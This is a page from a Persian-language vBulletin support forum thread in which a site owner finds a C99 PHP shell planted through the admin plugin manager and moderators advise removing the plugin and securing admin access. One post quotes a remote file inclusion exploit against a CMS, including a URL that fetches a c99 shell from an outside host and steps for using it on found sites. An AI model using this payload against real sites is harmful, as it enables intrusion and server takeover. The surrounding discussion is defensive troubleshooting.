تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
صفحه 3 از 4 نخستنخست 1234 آخرینآخرین
نمایش نتایج: از 21 به 30 از 34

موضوع: یک مشکل امنیتی خیلی بــــــــــــــــــزرگ

  1. Top | #21
    پاسخگو و راهنمای سایت

    تاریخ عضویت
    Jan 2010
    ورژن ویبولتین
    all version
    نوشته ها
    7,261
    مورد پسند
    9,128 بار
    نوشته های وبلاگ
    73
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 22.0
    میزان امتیاز
    917

    پیش فرض

    نقل قول نوشته اصلی توسط 7aj نمایش پست ها
    "Google Search : "© Sabdrimer CMS



    Exploit :

    404 - File or directory not found.[0]=[evil_script]



    My PHP Shell Address : 403 Forbidden



    که در کد بالا به جای [evil_script] باید کد پایینیشو رو قرار بدید که کد Exploit کامل میشه :

    404 - File or directory not found.[0]=http://www.godekalb.com/data/c99.txt?



    حالا مثلا شما یه سایت رو پیدا کردید که اخر ادرسش به صورت 404 - File or directory not found. است شما باید index.php رو پاک کنید و کد بالا رو به جاش کپی کنید

    البته موقع کپی حواستون باشه قسمت Create your website in minutes - Website.com رو همراه کد کپی نکنید

    و بعد از این کار حالا اینتر کنید و فایل c99 ..
    متوجه نشدم چی گفتید .
    لطفا واضح تر توضیح بدید .
    w w w . p 30 w e b . o r g




  2. گیفت کارت آیتونز

  3. Top | #22
    مدیر ارشد

    تاریخ عضویت
    Oct 2010
    ورژن ویبولتین
    v4.1.3 PL8
    نوشته ها
    6,765
    مورد پسند
    11,364 بار
    نوشته های وبلاگ
    63
    اطلاعات
    Mac OS X Safari 4.0
    میزان امتیاز
    924

    پیش فرض

    شما نام فایل را اعلام کنید ما در پکیج ویبولتین چک میکنیم. این فایل subscription بود که قرار دادم.

  4. Top | #23
    کاربر سایت

    تاریخ عضویت
    Apr 2013
    ورژن ویبولتین
    v4.2.0.Patch.Level.3
    نوشته ها
    543
    مورد پسند
    363 بار
    اطلاعات
    Windows 7/Server 2008 R2 Chrome 28.0.4.0
    میزان امتیاز
    65

    پیش فرض

    نقل قول نوشته اصلی توسط darkes نمایش پست ها
    اقا حسین شما که دیگه خودتون اخر امنیت هستید تویه یکی از فایل هام اون فایل که گفتم شل هست اپلود کنم مشاهده بفرمایید؟


    اگه می خواید هم کل اون وی بی که دانلود کردم رو اپ کنم بزارم

    پ.خ شد

    نقل قول نوشته اصلی توسط H0sseiN نمایش پست ها
    شما نام فایل را اعلام کنید ما در پکیج ویبولتین چک میکنیم. این فایل subscription بود که قرار دادم.
    دقیقا این فایل داخل ادمین سی پی حسین جان

    subscriptions.php

  5. Top | #24

    پیش فرض

    فایل subscriptons.php که ارسال کردید هیچ کد مخربی نداشت .

    کاربر مقابل از [email protected] بابت این پست مفید تشکر کرده است:



  6. Top | #25
    کاربر سایت

    تاریخ عضویت
    Apr 2013
    ورژن ویبولتین
    v4.2.0.Patch.Level.3
    نوشته ها
    543
    مورد پسند
    363 بار
    اطلاعات
    Windows 7/Server 2008 R2 Chrome 28.0.4.0
    میزان امتیاز
    65

    پیش فرض

    نقل قول نوشته اصلی توسط m.yMJJ نمایش پست ها
    فایل subscriptons.php که ارسال کردید هیچ کد مخربی نداشت .
    خوب بنظرتون مشکل از چی هست چون من وقتی رویه هاستم اپلود میکنم بجای این فایل یک شل بالا میاد
    ویرایش توسط VBlord : 2013/07/29 در ساعت 03:25 PM

  7. Top | #26
    مدیر بازنشته

    تاریخ عضویت
    Jun 2011
    ورژن ویبولتین
    -
    نوشته ها
    3,971
    مورد پسند
    4,923 بار
    اطلاعات
    Windows XP Firefox 19.0
    میزان امتیاز
    502

    پیش فرض

    درود به شما

    از مدیریت پلاگین و محصولات / مدیریت پلاگین باید وارد شوید و توی لیست دنبال اون شل بگردید و پاکش کنید . خدا میدونه هدف از این کار چی بوده و کی اینکار را کرده

    کاربر مقابل از Mehdi13 بابت این پست مفید تشکر کرده است:


    مای فون سایت تخصصی موبایل

    تبلیغات در مای فون با قیمت مناسب
    تبلیغات متنی ماهیانه فقط 1000 تومان

  8. Top | #27
    مدیر ارشد

    تاریخ عضویت
    Oct 2010
    ورژن ویبولتین
    v4.1.3 PL8
    نوشته ها
    6,765
    مورد پسند
    11,364 بار
    نوشته های وبلاگ
    63
    اطلاعات
    Windows 8 Chrome 28.0.1500.72
    میزان امتیاز
    924

    پیش فرض

    نقل قول نوشته اصلی توسط darkes نمایش پست ها
    دقیقا این فایل داخل ادمین سی پی حسین جان

    subscriptions.php
    در صفحه قبل کدهای همین فایل را قرار دادم.

    کاربر مقابل از H0sseiN بابت این پست مفید تشکر کرده است:


  9. Top | #28
    مدیر بازنشته

    تاریخ عضویت
    Jun 2011
    ورژن ویبولتین
    -
    نوشته ها
    3,971
    مورد پسند
    4,923 بار
    اطلاعات
    Windows XP Firefox 19.0
    میزان امتیاز
    502

    پیش فرض

    من قبلا این مشکل را داشتم و یک ماهی درگیر بودم و هیچکس هم نتونست کمکی بکنه
    همش این فایل subscriptions.php را حذف میکردم اپ میکردم و ... باز هم این مشکل بود
    فقط علی اقا بود که موضوع را فهمید و کاری که باید انجام بدم را بهم گفت .

    فقط کافیه از لیست پلاگین ها پیداش کنید و حذفش کنید مشکل حل میشه

    مای فون سایت تخصصی موبایل

    تبلیغات در مای فون با قیمت مناسب
    تبلیغات متنی ماهیانه فقط 1000 تومان

  10. Top | #29
    کاربر سایت

    تاریخ عضویت
    May 2010
    ورژن ویبولتین
    4.2
    سن
    22
    نوشته ها
    3,417
    مورد پسند
    8,062 بار
    نوشته های وبلاگ
    1
    اطلاعات
    Windows 7/Server 2008 R2 Chrome 28.0.1500.71
    میزان امتیاز
    523

    پیش فرض

    کسی پسوردتون رو داره که بتونه به admincp دسترسی داشته باشه ؟!
    شل رو از طریق محصولات ویبولتین - پلاگین ها آپلود کردند ، عموماً شل های xml c99 در فایل هایی نظیر subscription.php ؛ search.php و ... قرار میگیرند .
    این اتفاق زیاد افتاده برای کاربرا .. شما اولاً مطمعن بشید که کسی غیر از شما به ویبولتین و admincp دسترسی نداره ؛ ( چک کنید ببینید آیا قبلاً دسترسیهاتونو به کسی دادید ؟ برای هر مسئله ایی )
    ثانیاً تاپیک های قدیمی زیر رو یک مروری بفرمایید :
    اطلاعیه فوق العاده مهم ( همه توجه کنند )
    راهکار :
    آموزش جلوگیری از SQL Injection و ران شدن شل C99 در ویبولتین

    موفق باشید .

    2 تشکر توسط:



  11. Top | #30
    کاربر سایت

    تاریخ عضویت
    Apr 2013
    ورژن ویبولتین
    v4.2.0.Patch.Level.3
    نوشته ها
    543
    مورد پسند
    363 بار
    اطلاعات
    Windows 7/Server 2008 R2 Chrome 28.0.4.0
    میزان امتیاز
    65

    پیش فرض

    از تمامی دوستان ممنون که راهنمایی کامل کردند واقعا ممنون از همه (حسین . مهدی . اقا رامین . محمد و بقیه دوستان)

    فقط یه سوال هست

    اقا رامین اگر این کد رو بزارم دوباره اون فایل که شل بود رو اپلود کنم دیگه این مشکل بوجود نمیاد و میتونم اون فایل رو با خیال راحت اپلود کنم؟؟

    آموزش جلوگیری از SQL Injection و ران شدن شل C99 در ویبولتین


    با تشکر بسیــــار

صفحه 3 از 4 نخستنخست 1234 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ: 0
    آخرين نوشته: 2013/06/18, 12:36 PM
  2. چجوری سوال امنیتی رو جایگزین تصویر امنیتی بکنم؟
    توسط khaspashaeifans در انجمن پرسش و پاسخ
    پاسخ: 5
    آخرين نوشته: 2012/06/01, 07:20 PM
  3. پاسخ: 4
    آخرين نوشته: 2011/12/29, 02:23 AM
  4. پاسخ: 0
    آخرين نوشته: 2011/10/01, 09:57 PM

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •